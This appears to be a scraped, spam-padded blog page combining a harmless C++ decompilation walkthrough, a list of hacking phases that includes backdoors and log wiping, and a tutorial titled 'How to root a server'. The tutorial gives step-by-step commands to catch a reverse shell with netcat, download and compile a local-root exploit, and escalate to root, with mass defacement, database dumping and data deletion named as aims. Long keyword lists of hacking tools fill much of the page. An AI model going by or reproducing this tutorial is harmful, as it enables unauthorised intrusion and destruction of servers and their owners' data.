天和樹脂-浙江-上海-南通-http://www.chinaresins.com

AdSense

        

Reversing Some C++ Io Operations

In general decompilers are not friendly with c++ let's analyse a simple program to get familiar with it.
Let's implement a simple code that loads a file into a vector and then save the vector with following functions:

  • err
  • load
  • save
  • main


Lets identify the typical way in C++ to print to stdout with the operator "<<"


The basic_ostream is initialized writing the word "error" to the cout, and then the operator<< again to add the endl.




The Main function simply calls  "vec = load(filename)"  but the compiler modified it and passed the vector pointer as a parámeter. Then it bulds and prints "loaded  " << size << " users".
And finally saves the vector to /tmp/pwd and print "saved".
Most of the mess is basically the operator "<<" to concat and print values.
Also note that the vectors and strings are automatically deallocated when exit the function.


And here is the code:


Let's take a look to the load function, which iterates the ifs.getline() and push to the vector.
First of all there is a mess on the function definition, __return_storage_ptr is the vector.
the ifstream object ifs is initialized as a basic_ifstream and then operator! checks if it wasn't possible to open the file and in that case calls err()
We see the memset and a loop, getline read a cstr like line from the file, and then is converted to a string before pushing it to the vector. lVar1 is the stack canary value.

In this situations dont obfuscate with the vector pointer vec initialization at the begining, in this case the logic is quite clear.



The function save is a bit more tricky, but it's no more than a vector iteration and ofs writing.
Looping a simple "for (auto s : *vec)" in the decompiler is quite dense, but we can see clearly two write, the second write DAT_0010400b is a "\n"



As we see, save implememtation is quite straightforward.




Related articles
  1. Pentest Tools Free
  2. Hacker Tools For Windows
  3. Hack Tools For Mac
  4. Nsa Hacker Tools
  5. Hacking App
  6. Hacking Tools Online
  7. World No 1 Hacker Software
  8. Pentest Tools Nmap
  9. Hack Tools Mac
  10. Hacking Tools For Windows Free Download
  11. Pentest Tools Android
  12. Hacking Tools For Windows 7
  13. Hack Tools For Games
  14. Pentest Recon Tools
  15. Hacking Tools For Windows Free Download
  16. Tools 4 Hack
  17. Pentest Tools Free
  18. Bluetooth Hacking Tools Kali
  19. Hacking Tools Hardware
  20. Hacker Tools Hardware
  21. Hacker Tools Mac
  22. Pentest Tools Github
  23. Hacker Tools Hardware
  24. Wifi Hacker Tools For Windows
  25. Hacking Tools For Windows 7
  26. Github Hacking Tools
  27. Pentest Tools Nmap
  28. Hacker Hardware Tools
  29. Hacker Techniques Tools And Incident Handling
  30. Hacker Tools Apk Download
  31. How To Hack
  32. Hacker Tools For Mac
  33. Hacker Tools Mac
  34. Growth Hacker Tools
  35. Hacking Tools And Software
  36. Hacking Tools For Windows Free Download
  37. Hak5 Tools
  38. Install Pentest Tools Ubuntu
  39. Nsa Hacker Tools
  40. Pentest Tools For Windows
  41. Pentest Tools
  42. New Hacker Tools
  43. Hacking Tools Software
  44. Hacking Tools Name
  45. Hacking Tools For Games
  46. Hack Tools For Ubuntu
  47. Usb Pentest Tools
  48. Hacking Tools Free Download
  49. Game Hacking
  50. Hacking Tools For Windows 7
  51. Pentest Tools Download
  52. World No 1 Hacker Software
  53. Hacking Tools For Windows 7
  54. Hackers Toolbox
  55. Game Hacking
  56. Hak5 Tools
  57. Hacker Hardware Tools
  58. Hacking Tools For Pc
  59. Pentest Tools Windows
  60. Pentest Tools Find Subdomains
  61. Pentest Tools Linux
  62. Tools For Hacker
  63. Hacker Tools 2020
  64. World No 1 Hacker Software
  65. Hacking Tools Usb
  66. Hacker Tools For Mac
  67. Pentest Tools Download
  68. Ethical Hacker Tools
  69. Pentest Tools Android
  70. Hacker Tools Github
  71. Hacker Tools 2020
  72. Hack Tools For Pc
  73. Hack App
  74. Hack Tools Github
  75. Pentest Tools Free
  76. Beginner Hacker Tools
  77. Pentest Tools Apk
  78. Github Hacking Tools
  79. Hacker Tools Mac
  80. Hack Tools Mac
  81. Pentest Tools
  82. Hacking Tools Windows
  83. How To Install Pentest Tools In Ubuntu
  84. Hack Tools
  85. Hacking Tools Windows
  86. Growth Hacker Tools
  87. Pentest Tools Find Subdomains
  88. Pentest Tools Port Scanner
  89. Hacker Tools Software
  90. Hack Tools For Pc
  91. Hacking Tools For Games
  92. Hacking Tools Name
  93. Hacking Tools Online
  94. Top Pentest Tools
  95. Hacking Tools For Windows 7

0 留言

PHASES OF HACKING

What is the process of hacking or phases of hacking?
Hacking is broken up into six phases:The more you get close to all phases,the more stealth will be your attack.

1-Reconnaissance-This is the primary phase of hacking where hacker tries to collect as much as information as possible about the target.It includes identifying the target,domain name registration records of the target, mail server records,DNS records.The tools that are widely used in the process is NMAP,Hping,Maltego, and Google Dorks.

2-Scanning-This makes up the base of hacking! This is where planning for attack actually begins! The tools used in this process are Nessus,Nexpose,and NMAP. After reconnaissance the attacker scans the target for services running,open ports,firewall detection,finding out vulnerabilities,operating system detection.

3-Gaining Access-In this process the attacker executes the attack based on vulnerabilities which were identified during scanning!  After the successful, he get access to the target network or enter in to the system.The primary tools that is used in this process is Metasploit.

4-Maintaining Access-It is the process where the hacker has already gained access in to a system. After gaining access the hacker, the hacker installs some backdoors in order to enter in to the system when he needs access in this owned system in future. Metasploit is the preffered toll in this process.

5-Clearning track or Covering track-To avoid getting traced and caught,hacker clears all the tracks by clearing all kinds of logs and deleted the uploaded backdoor and anything in this process related stuff which may later reflect his presence!

6-Reporting-Reporting is the last step of finishing the ethical hacking process.Here the Ethical Hacker compiles a report with his findings and the job that was done such as the tools used,the success rate,vulnerabilities found,and the exploit process.

Related news


  1. Pentest Automation Tools
  2. Hacking Tools 2019
  3. Hacker Tools Free
  4. Wifi Hacker Tools For Windows
  5. Hacker Tools Apk
  6. Nsa Hacker Tools
  7. Physical Pentest Tools
  8. Pentest Tools For Windows
  9. Hacker Tools 2020
  10. Hacking Tools Windows
  11. Pentest Tools Apk
  12. Kik Hack Tools
  13. Kik Hack Tools
  14. Pentest Tools Find Subdomains
  15. Pentest Reporting Tools
  16. Hacking Tools For Pc
  17. Hacker Tools Free
  18. Hack Tools 2019
  19. Hacking Tools For Windows 7
  20. Hacking Tools For Beginners
  21. Hacking Tools
  22. How To Install Pentest Tools In Ubuntu
  23. What Is Hacking Tools
  24. How To Install Pentest Tools In Ubuntu
  25. Underground Hacker Sites
  26. Nsa Hack Tools Download
  27. Hack Tools For Windows
  28. Hacker Tools Free
  29. Pentest Tools For Android
  30. Hacker Tools Windows
  31. Hacking Tools Windows
  32. Wifi Hacker Tools For Windows
  33. Hacking Tools Github
  34. Best Hacking Tools 2020
  35. Hacking Tools Download
  36. Hack Tools
  37. Hacker Tools Free
  38. Best Hacking Tools 2019
  39. Hacking Tools Software
  40. Ethical Hacker Tools
  41. Hacking Tools Windows 10
  42. Hack Tools Download
  43. Pentest Tools Open Source
  44. Hacker Tools Free Download
  45. Free Pentest Tools For Windows
  46. Pentest Tools Review
  47. Hack Tools
  48. Pentest Tools Kali Linux
  49. Growth Hacker Tools
  50. World No 1 Hacker Software
  51. Hacking Tools And Software
  52. Game Hacking
  53. Hacking Tools For Windows
  54. Pentest Box Tools Download
  55. Hacker Search Tools
  56. Hack Tools For Mac
  57. Pentest Tools Open Source
  58. Hacker Tools 2020
  59. Hack Tools For Games
  60. Tools 4 Hack
  61. Hacking Tools For Mac
  62. How To Make Hacking Tools
  63. Hacking Tools 2020
  64. Pentest Tools Free
  65. Termux Hacking Tools 2019
  66. Hacker Tools Apk
  67. Hack App
  68. Hacker Tool Kit
  69. Pentest Tools Subdomain
  70. Hacking Tools For Mac
  71. Install Pentest Tools Ubuntu
  72. Hack Tools For Games
  73. Hacking Tools For Games
  74. Easy Hack Tools
  75. Best Pentesting Tools 2018
  76. Hacker Tools Hardware
  77. Game Hacking
  78. Pentest Tools Online
  79. Hacker Tools Software
  80. Hacker Tools 2020
  81. Hack Tools Mac
  82. Hacking Tools For Beginners
  83. Pentest Tools For Mac
  84. Hacker Tool Kit
  85. Free Pentest Tools For Windows
  86. Hacker Tools Online
  87. Hacker Tools Windows
  88. Wifi Hacker Tools For Windows
  89. Easy Hack Tools
  90. Pentest Tools Url Fuzzer
  91. Pentest Tools Alternative
  92. Hacking Tools For Kali Linux
  93. Pentest Tools Url Fuzzer
  94. Pentest Tools Find Subdomains
  95. Hacking Tools And Software
  96. Hackers Toolbox
  97. Computer Hacker
  98. Tools For Hacker
  99. Hack Tools Mac
  100. What Is Hacking Tools
  101. Pentest Box Tools Download
  102. Hacking Tools For Pc
  103. Hack Tools Mac
  104. Hacker Tools Free Download
  105. Computer Hacker
  106. Pentest Tools Linux
  107. Hacker Tools Software
  108. Pentest Tools Bluekeep
  109. Hacker Tools For Ios
  110. Hacker Tools Apk
  111. Hack Tool Apk No Root
  112. Hack Website Online Tool
  113. Pentest Tools Free
  114. Hacking Tools Name
  115. Pentest Reporting Tools
  116. Ethical Hacker Tools
  117. Growth Hacker Tools
  118. Hacking Tools For Windows 7
  119. Android Hack Tools Github
  120. Pentest Box Tools Download
  121. Pentest Tools Website Vulnerability
  122. Pentest Tools Online
  123. Pentest Tools Kali Linux
  124. Pentest Tools Subdomain

0 留言

HOW TO ROOT A SERVER? – SERVER ROOTING

Servers serve the requests made by the users to the web pages, it acts as a helping hand who serves the requested meal for you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with a server like delete and copy anything on the server, can deface all the websites (massive deface ).
We can't talk about root on windows. That enough for a beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to get root.

HOW TO ROOT A SERVER?

There are 3 ways to get ROOT on the server :
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.
After Uploading your shell on the server and getting the local root you will do a back connect and run the local root to Get root. This is a small idea of how it works in the next step you will see how to
find local root and run it to get root access.

HOW TO SEARCH LOCAL ROOT?

First of all we you need to know what version of Kernel.
You can know that from your shell, for example, this version is 2.6.18 – 2012
Go to EXECUTE on your shell and write  "uname -a". You will get the same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exist two types of local roots :
1. Local.C: which are not ready.
2. Local: ready to use.

HOW TO GET ROOT ACCESS?

First, you need a shell with a Back Connect option like this :
Enter your "Public IP Address" in SERVER, the port you want to connect on and leave it, Perl, this time, and Finally connect.
So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under Linux or CMD  if you are under Windows. I will explain only Linux, and for Windows, its all the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 – unzip local-Root.zip

4 – chmod 777 local.c

5 – now to change the local-root from local.c > local
gcc local.c -o local Then you will find local.c transformed to local

6 – chmod 777 local

7 – ./local to local rootwork

8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)


Getting UID=0 means, u had got root privileges and hence can do a variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
AFTER THE ROOT 
As server gets rooted, you're able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.
More info

0 留言